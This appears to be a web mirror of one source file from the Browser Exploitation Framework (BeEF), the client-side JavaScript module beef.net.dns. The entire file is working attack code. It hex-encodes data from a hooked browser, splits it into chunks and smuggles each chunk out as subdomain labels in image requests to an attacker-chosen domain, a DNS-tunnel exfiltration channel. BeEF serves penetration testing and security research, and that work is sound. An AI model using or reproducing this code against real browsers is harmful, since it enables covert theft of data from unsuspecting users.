Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
beefproject
GitHub Repository: beefproject/beef
 Path: blob/master/core/main/client/net/dns.js
1154 views
1
//

2
// Copyright (c) 2006-2025 Wade Alcorn - [email protected]

3
// Browser Exploitation Framework (BeEF) - https://beefproject.com

4
// See the file 'doc/COPYING' for copying permission

5
//

6


7
/**

8
 * 

9
 * request object structure:

10
 * + msgId: {Integer} Unique message ID for the request.

11
 * + domain: {String} Remote domain to retrieve the data.

12
 * + wait: {Integer} Wait time between requests (milliseconds) - NOT IMPLEMENTED

13
 * + callback: {Function} Callback function to receive the number of requests sent.

14
 * @namespace beef.net.dns

15
 */

16


17
beef.net.dns = {

18


19
	handler: "dns",

20
    /**

21
     * 

22
     * @param msgId 

23
     * @param data 

24
     * @param domain 

25
     * @param callback 

26
     */

27
	send: function(msgId, data, domain, callback) {

28


29
        var encode_data = function(str) {

30
            var result="";

31
            for(i=0;i<str.length;++i) {

32
                result+=str.charCodeAt(i).toString(16).toUpperCase();

33
            }

34
            return result;

35
        };

36


37
        var encodedData = encodeURI(encode_data(data));

38


39
        beef.debug(encodedData);

40
        beef.debug("_encodedData_ length: " + encodedData.length);

41


42
        // limitations to DNS according to RFC 1035:

43
        // o Domain names must only consist of a-z, A-Z, 0-9, hyphen (-) and fullstop (.) characters

44
        // o Domain names are limited to 255 characters in length (including dots)

45
        // o The name space has a maximum depth of 127 levels (ie, maximum 127 subdomains)

46
        // o Subdomains are limited to 63 characters in length (including the trailing dot)

47


48
        // DNS request structure:

49
        // COMMAND_ID.SEQ_NUM.SEQ_TOT.DATA.DOMAIN

50
      //max_length: 3.   3   .   3   . 63 . x

51


52
        // only max_data_segment_length is currently used to split data into chunks. and only 1 chunk is used per request.

53
        // for optimal performance, use the following vars and use the whole available space (which needs changes server-side too)

54
        var reserved_seq_length = 3 + 3 + 3 + 3; // consider also 3 dots

55
        var max_domain_length = 255 - reserved_seq_length; //leave some space for sequence numbers

56
        var max_data_segment_length = 63; // by RFC

57


58
        beef.debug("max_data_segment_length: " + max_data_segment_length);

59


60
        var dom = document.createElement('b');

61


62
        String.prototype.chunk = function(n) {

63
            if (typeof n=='undefined') n=100;

64
            return this.match(RegExp('.{1,'+n+'}','g'));

65
        };

66


67
        var sendQuery = function(query) {

68
            var img = new Image;

69
            //img.src = "http://"+query;

70
            img.src = beef.net.httpproto + "://" + query; // prevents issues with mixed content

71
            img.onload = function() { dom.removeChild(this); }

72
            img.onerror = function() { dom.removeChild(this); }

73
            dom.appendChild(img);

74


75
            //experimental

76
            //setTimeout(function(){dom.removeChild(img)},1000);

77
        };

78


79
        var segments = encodedData.chunk(max_data_segment_length);

80


81
        var ident = "0xb3"; //see extensions/dns/dns.rb, useful to explicitly mark the DNS request as a tunnel request

82


83
        beef.debug(segments.length);

84


85
        for (var seq=1; seq<=segments.length; seq++) {

86
            sendQuery(ident + msgId + "." + seq + "." + segments.length + "." + segments[seq-1] + "." + domain);

87
        }

88


89
		// callback - returns the number of queries sent

90
		if (!!callback) callback(segments.length);

91


92
	}

93


94
};

95


96
beef.regCmp('beef.net.dns');

97


98


99